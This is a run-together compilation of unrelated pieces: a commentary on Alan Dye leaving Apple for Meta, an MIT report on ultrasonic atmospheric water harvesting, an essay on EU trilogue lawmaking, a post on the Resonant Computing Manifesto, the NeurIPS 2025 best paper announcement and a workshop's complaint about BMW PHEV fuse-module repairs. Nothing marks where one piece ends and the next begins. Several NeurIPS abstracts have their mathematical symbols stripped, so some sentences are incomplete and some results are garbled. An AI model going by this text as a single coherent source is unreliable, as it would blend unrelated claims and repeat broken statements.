So it’s not just that Alan Dye jumped ship from Apple for the chief designer officer role at another company. 1 It’s not just that he left for a rival company. It’s that he left Apple for Meta , of all companies. Given what Cook has said about Meta publicly, one can only imagine what he thinks about them privately. Apple executives tend to stay at Apple. The stability of its executive team is unparalleled. But Dye is a senior leader who not only left for a rival, but the one rival that Cook and the rest of Apple’s senior leadership team consider the most antithetical to Apple’s ideals.
It would have been surprising if Dye had jumped ship to Google or Microsoft. It would have been a little more surprising if he’d left for Amazon, if only because Amazon seemingly places no cultural value whatsoever on design, as Apple practices it. But maybe with Amazon it would have been seen as Andy Jassy deciding to get serious about design, and thus, in a way, less surprising after the fact. But leaving Apple for Meta , of all companies, feels shocking. How could someone who would even consider leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company ?
So it’s not just that Alan Dye is a fraud of a UI designer and leader, and that Apple’s senior leadership had a blind spot to the ways Dye’s leadership was steering Apple’s interface design deeply astray. That’s problem enough, as I emphasized in my piece yesterday . It’s also that it’s now clear that Dye’s moral compass was not aligned with Apple’s either. Tim Cook and the rest — or at least most? — of Apple’s senior leadership apparently couldn’t see that, either.
Feeling thirsty? Why not tap into the air? Even in desert conditions, there exists some level of humidity that, with the right material, can be soaked up and squeezed out to produce clean drinking water. In recent years, scientists have developed a host of promising sponge-like materials for this “atmospheric water harvesting.”
But recovering the water from these materials usually requires heat — and time. Existing designs rely on heat from the sun to evaporate water from the materials and condense it into droplets. But this step can take hours or even days.
Now, MIT engineers have come up with a way to quickly recover water from an atmospheric water harvesting material. Rather than wait for the sun to evaporate water out, the team uses ultrasonic waves to shake the water out.
The researchers have developed an ultrasonic device that vibrates at high frequency. When a water-harvesting material, known as a “sorbent,” is placed on the device, the device emits ultrasound waves that are tuned to shake water molecules out of the sorbent. The team found that the device recovers water in minutes, versus the tens of minutes or hours required by thermal designs.
Unlike heat-based designs, the device does require a power source. The team envisions that the device could be powered by a small solar cell, which could also act as a sensor to detect when the sorbent is full. It could also be programmed to automatically turn on whenever a material has harvested enough moisture to be extracted. In this way, a system could soak up and shake out water from the air over many cycles in a single day.
“People have been looking for ways to harvest water from the atmosphere, which could be a big source of water particularly for desert regions and places where there is not even saltwater to desalinate,” says Svetlana Boriskina, principal research scientist in MIT’s Department of Mechanical Engineering. “Now we have a way to recover water quickly and efficiently.”
Boriskina and her colleagues report on their new device in a study appearing today in the journal Nature Communications . The study’s first author is Ikra Iftekhar Shuvo, an MIT graduate student in media arts and sciences, along with Carlos Díaz-Marín, Marvin Christen, Michael Lherbette, and Christopher Liem.
Precious hours
Boriskina’s group at MIT develops materials that interact with the environment in novel ways. Recently, her group explored atmospheric water harvesting (AWH), and ways that materials can be designed to efficiently absorb water from the air. The hope is that, if they can work reliably, AWH systems would be of most benefit to communities where traditional sources of drinking water — and even saltwater — are scarce.
Like other groups, Boriskina’s lab had generally assumed that an AWH system in the field would absorb moisture during the night, and then use the heat from the sun during the day to naturally evaporate the water and condense it for collection.
“Any material that’s very good at capturing water doesn’t want to part with that water,” Boriskina explains. “So you need to put a lot of energy and precious hours into pulling water out of the material.”
She realized there could be a faster way to recover water after Ikra Shuvo joined her group. Shuvo had been working with ultrasound for wearable medical device applications. When he and Boriskina considered ideas for new projects, they realized that ultrasound could be a way to speed up the recovery step in atmospheric water harvesting.
“It clicked: We have this big problem we’re trying to solve, and now Ikra seemed to have a tool that can be used to solve this problem,” Boriskina recalls.
Water dance
Ultrasound, or ultrasonic waves, are acoustic pressure waves that travel at frequencies of over 20 kilohertz (20,000 cycles per second). Such high-frequency waves are not visible or audible to humans. And, as the team found, ultrasound vibrates at just the right frequency to shake water out of a material.
“With ultrasound, we can precisely break the weak bonds between water molecules and the sites where they’re sitting,” Shuvo says. “It’s like the water is dancing with the waves, and this targeted disturbance creates momentum that releases the water molecules, and we can see them shake out in droplets.”
Shuvo and Boriskina designed a new ultrasonic actuator to recover water from an atmospheric water harvesting material. The heart of the device is a flat ceramic ring that vibrates when voltage is applied. This ring is surrounded by an outer ring that is studded with tiny nozzles. Water droplets that shake out of a material can drop through the nozzle and into collection vessels attached above and below the vibrating ring.
They tested the device on a previously designed atmospheric water harvesting material. Using quarter-sized samples of the material, the team first placed each sample in a humidity chamber, set to various humidity levels. Over time, the samples absorbed moisture and became saturated. The researchers then placed each sample on the ultrasonic actuator and powered it on to vibrate at ultrasonic frequencies. In all cases, the device was able to shake out enough water to dry out each sample in just a few minutes.
The researchers calculate that, compared to using heat from the sun, the ultrasonic design is 45 times more efficient at extracting water from the same material.
“The beauty of this device is that it’s completely complementary and can be an add-on to almost any sorbent material,” says Boriskina, who envisions a practical, household system might consist of a fast-absorbing material and an ultrasonic actuator, each about the size of a window. Once the material is saturated, the actuator would briefly turn on, powered by a solar cell, to shake out the water. The material would then be ready to harvest more water, in multiple cycles throughout a single day.
“It’s all about how much water you can extract per day,” she says. “With ultrasound, we can recover water quickly, and cycle again and again. That can add up to a lot per day.”
This work was supported, in part, by the MIT Abdul Latif Jameel Water and Food Systems Lab and the MIT-Israel Zuckerman STEM Fund.
This work was carried out in part by using MIT.nano and ISN facilities at MIT.
The central puzzle of the EU is its extraordinary productivity. Grand coalitions, like the government recently formed in Germany, typically produce paralysis. The EU’s governing coalition is even grander, spanning the center-right EPP, the Socialists, the Liberals, and often the Greens, yet between 2019 and 2024, the EU passed around 13,000 acts, about seven per day. The U.S. Congress, over the same period, produced roughly 3,500 pieces of legislation and 2,000 resolutions. 1
Not only is the coalition broad, but encompasses huge national and regional diversity. In Brussels, the Parliament has 705 members from roughly 200 national parties. The Council represents 27 sovereign governments with conflicting interests. A law faces a double hurdle, where a qualified majority of member states and of members of parliament must support it. The system should produce gridlock, more still than the paralysis commonly associated with the American federal government. Yet it works fast and produces a lot, both good and bad. The reason lies in the incentives: every actor in the system is rewarded for producing legislation, and not for exercising their vetoes.
Understanding the incentives
The Commission initiates legislation, but it has no reason to be reticent. It cannot make policy by announcing new spending commitments and investments, as the budget is tiny, around one percent of GDP, and what little money it has is mostly earmarked for agriculture (one-third) and regional aid (one-third). In Brussels, policy equals legislation. Unlike national civil servants and politicians, civil servants and politicians who work in Brussels have one main path to build a career: passing legislation.
Legislation is valuable to the Commission, as new laws expand Commission competences, create precedent, employ more staff, and justify larger budgets. The Commission, which is indirectly elected and faces little pressure from voters, has no institutional interest in concluding that EU action is unnecessary, that existing national rules suffice, or that a country already has a great solution and others should simply learn from it.
The formal legislative process was designed to work through public disagreement, with each institution’s amendments debated and voted on in open session. The Commission proposes the text. Parliament debates and amends it in public. The Council reviews it and can force changes. If they disagree, the text bounces back and forth. If the deadlock persists, a joint committee attempts to force a compromise before a final vote. Each stage requires a full majority. Contentious laws took years.
This slow process changed in stages. The Amsterdam Treaty (1999) allowed Parliament and Council to adopt laws at the First Reading if an agreement was reached early. Initially, this was exceptional, but by the 2008 financial crisis, speed became a priority. The Barroso Commission argued that EU survival required rapid response, and it deemed sequential public readings too slow.
The trilogues became the solution after a formal “declaration” in 2007, though the Treaties never mention them. Instead of public debate, representatives from the Parliament, Council, and Commission meet privately to agree on the text. They work from a “four-column document.” The first three columns list the starting positions of each institution, the fourth column contains the emerging law. The Commission acts as the “pen-holder” for this fourth column. This gives them immense power: by controlling the wording of the compromise, they can subtly exclude options they dislike.
Because these meetings are informal, they lack rules on duration or conduct. Negotiators often work in “marathon” sessions that stretch until dawn to force a deal. The final meeting for the AI Act, for instance, lasted nearly 38 hours . This physical exhaustion leads to drafting errors. Ministers and MEPs, desperate to finish, agree to complex details at 4:00 a.m. that they have not properly read. By the time the legislation reaches the chamber floor, the deal is done, errors and all. 2
The European Parliament is the institution that is accountable to the voters. But it is the parliamentary committees, and their ideology, that matter, not the plenary or the political parties to which MEPs belong. Those who join EMPL, which covers labor laws, want stronger social protections. Those who join ENVI want tougher climate rules.
The committee coordinator for each political group appoints one MEP to handle the legislative file: the Rapporteur for the lead group, Shadow Rapporteurs for the others. These five to seven people negotiate the law among themselves, nominally on behalf of their groups. In practice, no one outside the committee has any say.
When the negotiating team reaches an agreement (normally, a grand coalition of the centrist groups), they return to the full committee. The committee in turn usually backs the deal, given that the rapporteurs who made it represent a majority in the committee, and the committee self-selects based on ideology.
Crucially, the rapporteurs then present the deal to their political groups as inevitable, based on the tenuous majority of the centrist coalition that governs Europe. “This is the best compromise we can get,” the rapporteur invariably announces. “Any amendment will cause the EPP/Greens/S&D/Renew to drop the deal.”
Groups face pressure for a simple up-or-down vote, and often prefer to claim a deal than doing nothing. MEPs who refuse to support the deal may be branded as troublemakers and risk losing support on their own files in the future.
Often just a couple of weeks after the committee vote, the legislation reaches the full Parliament to obtain a mandate authorizing trilogue negotiations, with little time for the remaining MEPs to grasp what is happening.
The dynamic empowers a small committee majority to drive major policy change. For example, in May 2022, the ENVI committee (by just 6 votes) approved a mandate to cut by 100% CO₂ emissions from new cars by 2035. De facto, this bans new petrol and diesel cars from that date.
Less than four weeks later, in June 2022, Parliament rubber stamped that position as its official negotiating mandate, with a “Ferrari” exception for niche sports cars. This four weeks left almost no time to debate, consult national delegations, or reconsider the committee’s position. From that slim committee vote, the EU proceeded toward an historic shift to electric vehicles continent-wide.
Similarly, the EMPL committee approved, in November 2021, the Directive on Adequate Minimum Wages, even though Article 153(5) of the Treaty on the Functioning of the EU explicitly excludes “pay” from the EU’s social policy competences. Co-Rapporteurs Dennis Radtke (center-right EPP) and Agnes Jongerius (center-left S&D) formed a tight alliance and gained a majority in committee, sidelining fierce opposition from countries like Denmark and Sweden that wished to protect their national wage-bargaining systems.
The committee’s text was rushed to plenary and adopted as Parliament’s position fourteen days later (in late November). The system let a committee majority deliver a law the Court of Justice ruled partially illegal in November 2025 precisely at the request of the Nordic states, striking down Article 5(2) on criteria for setting minimum wages.
The player you’d expect to check any excesses is the Council of Ministers from the member states, which represents national governments. But the way the Council participates in the drafting dilutes this check. The Council is represented by the country holding the rotating Presidency, which changes every six months. Each Presidency comes in with a political agenda and a strong incentive to succeed during its short tenure. With a 13-year wait before that member state will hold it again, the Presidency is under pressure to close deals quickly, especially on its priority files, to claim credit. This can make the Council side surprisingly eager to compromise and wrap things up, even at the cost of making more concessions than some member states would ideally like.
The Commission presents itself as a neutral broker during the trilogue process. It is not. By controlling the wording of the draft agreement (“Column four”), the Commission can subtly exclude options misaligned with its preferences. It knows the dossiers inside out and can use its institutional memory to its advantage. Commission services analyze positions of key MEPs and Council delegations in advance, triangulating deals that preserve core objectives.
The Commission also exploits the six-month presidency rotation. Research shows it strategically delays proposals until a Member State with similar preferences takes over. 3 As the six-month Presidency clock winds down, the Council’s willingness to make concessions often increases. No country wants to hand off an unfinished file to the next country, if it can avoid it. The Commission, aware of this, often pushes for marathon trilogues right before deadlines or the end of a Presidency to extract the final compromises.
As legislation has grown more technical, elected officials have grown more reliant on their staff. Accredited Parliamentary Assistants (APAs) to MEPs, as well as political group advisers and Council attachés, play a large role. These staffers have become primary drafters of amendments and key negotiators representing their bosses in “technical trilogues”, where substantial political decisions are often disguised as technical adjustments. 4
COVID-19 accelerated this. Physical closure increased reliance on written exchanges and remote connections, favoring APAs and the permanent secretariats of Commission, Parliament, and Council. The pandemic created a “Zoom Parliament” where corridor conversations, crucial to coalition-building among MEPs, disappeared. In my experience, they did not fully return after the pandemic. This again greatly strengthened the hand of the Commission.
Quantity without quality
The result of this volume bias in the system is an onslaught of low-quality legislation. Compliance is often impossible. A BusinessEurope analysis cited by the Draghi report looked at just 13 pieces of EU legislation and found 169 cases where different laws impose requirements on the same issue. In almost a third of these overlaps, the detailed requirements were different, and in about one in ten they were outright contradictory.
Part of the problem is the lack of feedback loops and impact assessment at the aggregate level. The Commission’s Standard Cost Model for calculating regulatory burdens varies in application across files. Amendments introduced by Parliament or Council are never subject to cost-benefit analysis. No single methodology assesses EU legislation once transposed nationally. Only a few Member States systematically measure a transposed law’s impact. The EU has few institutionalized mechanisms to evaluate whether a given piece of legislation actually achieved its objectives. Instead, the Brussels machinery tends to simply move on to the next legislative project.
Brussels’ amazing productivity doesn’t make sense if you look at how the treaties are written, but it is obvious once you understand the informal incentives facing every relevant player in the process. Formally, the EU is a multi-actor system with many veto points (Commission, Parliament, Council, national governments, etc.), which should require broad agreement and hence slow decision making. In practice, consensus is manufactured in advance rather than reached through deliberation.
By the time any proposal comes up for an official vote, most alternatives have been eliminated behind closed doors. A small team of rapporteurs agrees among themselves; the committee endorses their bargain; the plenary, in turn, ratifies the committee deal; and the Council Presidency, pressed for time, accepts the compromise (with both Council and Parliament influenced along the way by the Commission’s mediation and drafting). Each actor can thus claim a victory and no one’s incentive is to apply the brakes.
This “trilogue system” has proven far more effective at expanding the scope of EU law than a truly pluralistic, many-veto-player system would be. In the EU’s political economy, every success and every failure leads to “more law,” and the system is finely tuned to deliver it.
The Resonant Computing Manifesto . Launched today at WIRED’s The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.
This part in particular resonates with me:
For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.
This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations.
There are echos here of the Malleable software concept from Ink & Switch.
The manifesto proposes five principles for building resonant software: Keeping data private and under personal stewardship, building software that's dedicated to the user's interests, ensuring plural and distributed control rather than platform monopolies, making tools adaptable to individual context, and designing for prosocial membership of shared spaces.
Steven Levy talked to the manifesto's lead instigator Alex Komoroske and provides some extra flavor in It's Time to Save Silicon Valley From Itself :
By 2025, it was clear to Komoroske and his cohort that Big Tech had strayed far from its early idealistic principles. As Silicon Valley began to align itself more strongly with political interests, the idea emerged within the group to lay out a different course, and a casual suggestion led to a process where some in the group began drafting what became today’s manifesto. They chose the word “resonant” to describe their vision mainly because of its positive connotations. As the document explains, “It’s the experience of encountering something that speaks to our deeper values.”
The Best Paper Award Committee members were nominated by the Program Chairs and the Database and Benchmark track chairs, who selected leading researchers across machine learning topics. These nominations were approved by the General Chairs and Next Generation and Accessibility Chairs.
The best paper award committees were tasked with selecting a handful of highly impactful papers from the Main Track and the Datasets & Benchmark Track of the conference.
With that, we are excited to share the news that the best and runner-up paper awards this year go to seven groundbreaking papers, including four best papers (one of which is from the datasets and benchmarks track) and three runner-ups. The seven papers highlight advances in diffusion model theory, self-supervised reinforcement learning, attention mechanisms for large language models, reasoning capabilities in LLMs, online learning theory, neural scaling laws, and benchmarking methodologies for language model diversity.
The winners are presented here in alphabetical order by title.
Artificial Hivemind: The Open-Ended Homogeneity of Language Models (and Beyond)
Abstract
Large language models (LMs) often struggle to generate diverse, human-like creative content, raising concerns about the long-term homogenization of human thought through repeated exposure to similar outputs. Yet scalable methods for evaluating LM output diversity remain limited, especially beyond narrow tasks such as random number or name generation, or beyond repeated sampling from a single model. To address this gap, we introduce Infinity-Chat, a large-scale dataset of 26K diverse, real-world, open-ended user queries that admit a wide range of plausible answers with no single ground truth. We introduce the first comprehensive taxonomy for characterizing the full spectrum of open-ended prompts posed to LMs, comprising 6 top-level categories (e.g., creative content generation, brainstorm & ideation) that further breaks down to 17 subcategories. Using Infinity-Chat, we present a large-scale study of mode collapse in LMs, revealing a pronounced Artificial Hivemind effect in open-ended generation of LMs, characterized by (1) intra-model repetition, where a single model consistently generates similar responses, and more so (2) inter-model homogeneity, where different models produce strikingly similar outputs. Infinity-Chat also includes 31,250 human annotations, across absolute ratings and pairwise preferences, with 25 independent human annotations per example. This enables studying collective and individual-specific human preferences in response to open-ended queries. Our findings show that state-of-the-art LMs, reward models, and LM judges are less well calibrated to human ratings on model generations that elicit differing idiosyncratic annotator preferences, despite maintaining comparable overall quality. Overall, INFINITY-CHAT presents the first large-scale resource for systematically studying real-world open-ended queries to LMs, revealing critical insights to guide future research for mitigating long-term AI safety risks posed by the Artificial Hivemind.
Reflections from the Selection Committee
This paper makes a substantial and timely contribution to the understanding of diversity, pluralism, and societal impact in modern language models. The authors introduce Infinity-Chat, a rigorously constructed benchmark of 26K real-world open-ended queries paired with 31K dense human annotations, enabling systematic evaluation of creative generation, ideation, and subjective preference alignment, dimensions historically underexamined in AI evaluation. Beyond releasing a valuable dataset, the paper provides deep analytical insights through the first comprehensive taxonomy of open-ended prompts and an extensive empirical study across more than 70 models, revealing the Artificial Hivemind effect: pronounced intra- and inter-model homogenization that raises serious concerns about long-term risks to human creativity, value plurality, and independent thinking. The findings expose critical miscalibration between current reward models, automated judges, and diverse human preferences, highlighting the tension between alignment and diversity and establishing a foundation for future work on preserving heterogeneity in AI systems. Overall, this work sets a new standard for datasets and benchmarks that advance scientific understanding and address pressing societal challenges rather than solely improving technical performance.
Gated Attention for Large Language Models: Non-linearity, Sparsity, and Attention-Sink-Free
Abstract
Gating mechanisms have been widely utilized, from early models like LSTMs and Highway Networks to recent state space models, linear attention, and also softmax attention. Yet, existing literature rarely examines the specific effects of gating. In this work, we conduct comprehensive experiments to systematically investigate gating-augmented softmax attention variants. Specifically, we perform a comprehensive comparison over 30 variants of 15B Mixture-of-Experts (MoE) models and 1.7B dense models trained on a 3.5 trillion token dataset. Our central finding is that a simple modification—applying a head-specific sigmoid gate after the Scaled Dot-Product Attention (SDPA)—consistently improves performance. This modification also enhances training stability, tolerates larger learning rates, and improves scaling properties. By comparing various gating positions and computational variants, we attribute this effectiveness to two key factors: (1) introducing non-linearity upon the low-rank mapping in the softmax attention, and (2) applying query-dependent sparse gating scores to modulate the SDPA output. Notably, we find this sparse gating mechanism mitigates massive activation, attention sink and enhances long-context extrapolation performance. We also release related codes ( https://github.com/qiuzh20/gated_attention} ) and models ( https://huggingface.co/QwQZh/gated_attention ) to facilitate future research. Furthermore, the most effective SDPA output gating is used in the Qwen3-Next models ( https://huggingface.co/collections/Qwen/qwen3-next ).
Reflections from the Selection Committee
The main finding of this paper is that the performance of large language models using softmax attention can be consistently improved by introducing head-specific sigmoid gating after the scaled dot product attention operation in both dense and mixture-of-experts (MoE) Transformer models. This finding is backed up by more than thirty experiments on different variants of gated softmax attention using 15B MoE and 1.7B dense models trained on large-scale datasets of 400B, 1T, or 3.5T tokens. The paper also includes careful analyses showing that the introduction of the authors’ recommended form of gating improves the training stability of large language models, reduces the “attention sink” phenomenon that has been widely reported in attention models, and enhances the performance of context length extension. The main recommendation of the paper is easily implemented, and given the extensive evidence provided in the paper for this modification to LLM architecture, we expect this idea to be widely adopted. This paper represents a substantial amount of work that is possible only with access to industrial scale computing resources, and the authors’ sharing of the results of their work, which will advance the community’s understanding of attention in large language models, is highly commendable, especially in an environment where there has been a move away from open sharing of scientific results around LLMs.
1000 Layer Networks for Self-Supervised RL: Scaling Depth Can Enable New Goal-Reaching Capabilities
Abstract
Scaling up self-supervised learning has driven breakthroughs in language and vision, yet comparable progress has remained elusive in reinforcement learning (RL). In this paper, we study building blocks for self-supervised RL that unlock substantial improvements in scalability, with network depth serving as a critical factor. Whereas most RL papers in recent years have relied on shallow architectures (around 2 — 5 layers), we demonstrate that increasing the depth up to 1024 layers can significantly boost performance. Our experiments are conducted in an unsupervised goal-conditioned setting, where no demonstrations or rewards are provided, so an agent must explore (from scratch) and learn how to maximize the likelihood of reaching commanded goals. Evaluated on simulated locomotion and manipulation tasks, our approach increases performance on the self-supervised contrastive RL algorithm by — , outperforming other goal-conditioned baselines. Increasing the model depth not only increases success rates but also qualitatively changes the behaviors learned.
Reflections from the Selection Committee
This paper challenges the conventional assumption that the information provided by reinforcement learning (RL) is insufficient to effectively guide the numerous parameters of deep neural networks, hence suggesting that large AI systems be predominantly trained through self-supervision, with RL reserved solely for fine-tuning. The work introduces a novel and easy-to-implement RL paradigm for the effective training of very deep neural networks, employing self-supervised and contrastive RL. The accompanying analysis demonstrates that RL can scale efficiently with increasing network depth, leading to the emergence of more sophisticated capabilities. In addition to presenting compelling results, the study includes several useful analyses, for example, for highlighting the important role of batch size scaling for deeper networks within contrastive RL.
Why Diffusion Models Don’t Memorize: The Role of Implicit Dynamical Regularization in Training
Abstract
Diffusion models have achieved remarkable success across a wide range of generative tasks. A key challenge is understanding the mechanisms that prevent their memorization of training data and allow generalization. In this work, we investigate the role of the training dynamics in the transition from generalization to memorization. Through extensive experiments and theoretical analysis, we identify two distinct timescales: an early time at which models begin to generate high-quality samples, and a later time beyond which memorization emerges. Crucially, we find that increases linearly with the training set size , while remaining constant. This creates a growing window of training times where models generalize effectively, despite showing strong memorization if training continues beyond it. It is only when it becomes larger than a model-dependent threshold that overfitting disappears at infinite training times. These findings reveal a form of implicit dynamical regularization in the training dynamics, which allows to avoid memorization even in highly overparameterized settings. Our results are supported by numerical experiments with standard U-Net architectures on realistic and synthetic datasets, and by a theoretical analysis using a tractable random features model studied in the high-dimensional limit.
Reflections from the Selection Committee
This paper presents foundational work on the implicit regularization dynamics of diffusion models, delivering a powerful result by unifying empirical observation with formal theory. The critical finding is the quantitative identification of two distinct, predictable timescales, an early, dataset-independent generalization phase followed by a linear, dataset-size-dependent memorization phase . This demonstration of an expanding window for effective generalization is not merely an empirical finding but is rigorously explained by deriving the spectral properties of the random features model using random matrix theory. By linking the practical success of diffusion models directly to a provable dynamical property (the implicit postponement of overfitting), the paper provides fundamental, actionable insight into the mechanisms governing modern generative AI, setting a new standard for analytical depth in the study of generalization.
Does Reinforcement Learning Really Incentivize Reasoning Capacity in LLMs Beyond the Base Model?
Abstract
Reinforcement Learning with Verifiable Rewards (RLVR) has recently demonstrated notable success in enhancing the reasoning performance of large language models (LLMs), particularly in mathematics and programming tasks. It is widely believed that, similar to how traditional RL helps agents to explore and learn new strategies, RLVR enables LLMs to continuously self-improve, thus acquiring novel reasoning abilities that exceed the capacity of the corresponding base models. In this study, we take a critical look at \textit{the current state of RLVR} by systematically probing the reasoning capability boundaries of RLVR-trained LLMs across diverse model families, RL algorithms, and math/coding/visual reasoning benchmarks, using pass@\textit{k} at large \textit{k} values as the evaluation metric. While RLVR improves sampling efficiency towards the correct path, we surprisingly find that current training does \emph{not} elicit fundamentally new reasoning patterns. We observe that while RLVR-trained models outperform their base models at smaller values of (\eg, =1), base models achieve higher pass@ score when is large. Moreover, we observe that the reasoning capability boundary of LLMs often narrows as RLVR training progresses. Further coverage and perplexity analysis shows that the reasoning paths generated by RLVR models are already included in the base models’ sampling distribution, suggesting that their reasoning abilities originate from and are \textit{bounded} by the base model. From this perspective, treating the base model as an upper bound, our quantitative analysis shows that six popular RLVR algorithms perform similarly and remain far from optimal in fully leveraging the potential of the base model. In contrast, we find that distillation can introduce new reasoning patterns from the teacher and genuinely expand the model’s reasoning capabilities. Taken together, our findings suggest that current RLVR methods have not fully realized the potential of RL to elicit genuinely novel reasoning abilities in LLMs. This underscores the need for improved RL paradigms—such as continual scaling and multi-turn agent-environment interaction—to unlock this potential.
Reflections from the Selection Committee
This paper delivers a masterfully executed and critically important negative finding on a widely accepted, foundational assumption in Large Language Model (LLM) research: that Reinforcement Learning with Verifiable Rewards (RLVR) elicits genuinely new reasoning capabilities. The paper shows that RLVR training, across various model families, tasks, and algorithms, enhances sampling efficiency without expanding the reasoning capacity already present in base models. RL narrows exploration, rewarded trajectories are amplified, but the broader solution space shrinks, revealing that RLVR optimizes within, rather than beyond, the base distribution. This is an important finding which will hopefully incentivize fundamentally new RL paradigms able to navigate the vast action space and genuinely expand LLM reasoning capabilities.
Optimal Mistake Bounds for Transductive Online Learning
Abstract
We resolve a 30-year-old open problem concerning the power of unlabeled data in online learning by tightly quantifying the gap between transductive and standard online learning. We prove that for every concept class with Littlestone dimension , the transductive mistake bound is at least . This establishes an exponential improvement over previous lower bounds of , , and , respectively due to Ben-David, Kushilevitz, and Mansour (1995, 1997) and Hanneke, Moran, and Shafer (2023). We also show that our bound is tight: for every , there exists a class of Littlestone dimension with transductive mistake bound . Our upper bound also improves the previous best known upper bound from Ben-David et al. (1997). These results demonstrate a quadratic gap between transductive and standard online learning, thereby highlighting the benefit of advanced access to the unlabeled instance sequence. This stands in stark contrast to the PAC setting, where transductive and standard learning exhibit similar sample complexities.
Reflections from the Selection Committee
This paper presents a breakthrough in learning theory, deserving the NeurIPS Best Paper Runner-Up award for its elegant, comprehensive, and definitive resolution of a 30-year-old open problem. The authors have not only precisely quantified the optimal mistake bound for transductive online learning as Ω(√d), but they have also achieved a tight match with an O(√d) upper bound. This establishes a quadratic gap between transductive and standard online learning, a result that represents an exponential leap beyond all previous logarithmic lower bounds and dramatically highlights the theoretical value of unlabeled data in this setting—a crucial insight distinct from its more limited role in PAC learning.
The novelty and ingenuity of their proof techniques are quite remarkable. For the lower bound, the adversary employs a sophisticated strategy that balances forcing mistakes with carefully managing the shrinking of the version space, leveraging the concept of “paths in trees” as a fundamental underlying structure. The upper bound, demonstrating the learnability within O(√d) mistakes, introduces an innovative hypothesis class construction that embeds a “sparse encoding” for off-path nodes – a probabilistic design where most off-path labels are zero, but the rare ones carry immense information. The learner’s strategy to exploit this class is equally brilliant, integrating several non-standard sophisticated techniques: “Danger Zone Minimization” to control the instance sequence presented by the adversary, “Splitting Experts” via a multiplicative weights approach to handle uncertainty about a node’s on-path status, and a strategic “Transition to Halving” once sufficient information is gathered from the sparsely encoded off-path labels. This intricate interplay between a cleverly constructed hypothesis class and a highly adaptive learning algorithm showcases a masterclass in theoretical analysis and design.
Superposition Yields Robust Neural Scaling
Abstract
The success of today’s large language models (LLMs) depends on the observation that larger models perform better. However, the origin of this neural scaling law, that loss decreases as a power law with model size, remains unclear. We propose that representation superposition, meaning that LLMs represent more features than they have dimensions, can be a key contributor to loss and cause neural scaling. Based on Anthropic’s toy model, we use weight decay to control the degree of superposition, allowing us to systematically study how loss scales with model size. When superposition is weak, the loss follows a power law only if data feature frequencies are power-law distributed. In contrast, under strong superposition, the loss generically scales inversely with model dimension across a broad class of frequency distributions, due to geometric overlaps between representation vectors. We confirmed that open-sourced LLMs operate in the strong superposition regime and have loss scaling inversely with model dimension, and that the Chinchilla scaling laws are also consistent with this behavior. Our results identify representation superposition as a central driver of neural scaling laws, providing insights into questions like when neural scaling laws can be improved and when they will break down.
Reflections from the Selection Committee:
This paper moves beyond observation of neural scaling laws—the empirically established phenomenon in which model loss exhibits a power-law decrease as model size, dataset size, or computational resources are increased—to demonstrate that representation superposition constitutes the primary mechanism governing these laws. Authors introduce a controlled “toy model” to examine how superposition and data structure affect the scaling of loss with model size and demonstrate that under strong superposition where features are overlapping, the loss scales consistently as an inverse power law with respect to the model dimension. The core findings are supported by a series of carefully designed experiments and offer fresh insights into an important research area.
The selection of these papers reflects the remarkable breadth of research presented at NeurIPS 2025, spanning generative modeling, reinforcement learning, natural language processing, learning theory, neural scaling, and benchmarking methodologies. The diversity of topics among the awarded papers demonstrates the vibrant and multifaceted nature of machine learning research.
We extend our congratulations to all the award recipients and look forward to seeing these works presented at the conference this December! Please note that the award certificates will be given out during the paper’s respective oral sessions by the session chairs.
We would also like to extend our gratitude and appreciation to the members of the Best Paper Award Committee listed here.
Best Paper Award Committee for Main Track and Database and Benchmark Tracks
2021 > PHEV BMW iBMUCP PHEV Post-Crash Recovery — When EU engineering becomes a synonym for “unrepairable” + “generating waste”.
If you own a BMW PHEV — or if you’re an insurance company — every pothole, every curb impact, and even every rabbit jumping out of a bush represents a potential €5,000 cost, just for a single fuse inside the high-voltage battery system.
This “safety fuse” is designed to shut the system down the moment any crash event is detected. Sounds safe — but extremely expensive. Theoraticaly insurance for BMW PHEV should be 3x higher than ICE or EV
Unfortunately, that’s not the only issue.
BMW has over-engineered the diagnostic procedure to such a level that even their own technicians often do not know the correct replacement process. And it gets worse: the original iBMUCP module, which integrates the pyrofuse, contactors, BMS and internal copper-bonded circuitry, is fully welded shut. There are no screws, no service openings, and it is not designed to be opened, even though the pyrofuse and contactors are technically replaceable components. Additionally, the procedure requires flashing the entire vehicle both before and after the replacement, which adds several hours to the process and increases risk of bricked components which can increase the recovery cost by factor 10x.
But that is still not the only problem.
Even after we managed to open the unit and access everything inside, we discovered that the Infineon TC375 MCU is fully locked. Both the D-Flash sectors and crash-flag areas are unreadable via DAP or via serial access.
Meaning: even if you replace the pyrofuse, you still cannot clear the crash flag, because the TC375 is cryptographically locked.
This leaves only one method:
➡️ Replace the entire iBMUCP module with a brand-new one. (1100€ + tax for faulty fuse)
And the registration of the new component is easily one of the worst procedures we have ever seen. You need an ICOM, IMIB, and AOS subscription — totalling over €25,000 in tools — just to replace a fuse. (even we managed to activate this one with IMIB, it will be necessary in some situation)
Yes, you read that correctly, 25,000€
Lot of vehicles designed and produced in Europe — ICE, PHEV, and EV — have effectively become a missleading ECO exercise. Vehicles marketed as “CO₂-friendly” end up producing massive CO₂ footprints through forced services, throw-away components, high failure rates and unnecessary parts manufacturing cycles, overcomplicated service procedures, far larger than what the public is told. If we are destroying our ICE automotive industry based on EURO norms, who is calculating real ECO footprint of replacement part manucfacturing, unecessary servicing and real waste cost?
We saw this years ago on diesel and petrol cars:
DPF failures, EGR valves, high-pressure pumps, timing belts running in oil, low quality automatic transmissions, and lubrication system defects. Everyone calculates the CO₂ footprint of a moving vehicle — nobody calculates the CO₂ footprint of a vehicle that is constantly broken and creating waste.
ISTA’s official iBMUCP replacement procedure is so risky that if you miss one single step — poorly explained within ISTA — the system triggers ANTITHEFT LOCK.
This causes the balancing controller to wipe and lock modules.
Meaning: even in an authorised service centre, system can accidentally delete the configuration and end up needing not only a new iBMUCP, but also all new battery modules.
Yes — replacing a fuse can accidentally trigger the replacement of all healthy HV modules, costing €6,000+ VAT per module, plus a massive unknown CO₂ footprint.
This has already happened to several workshops in the region.
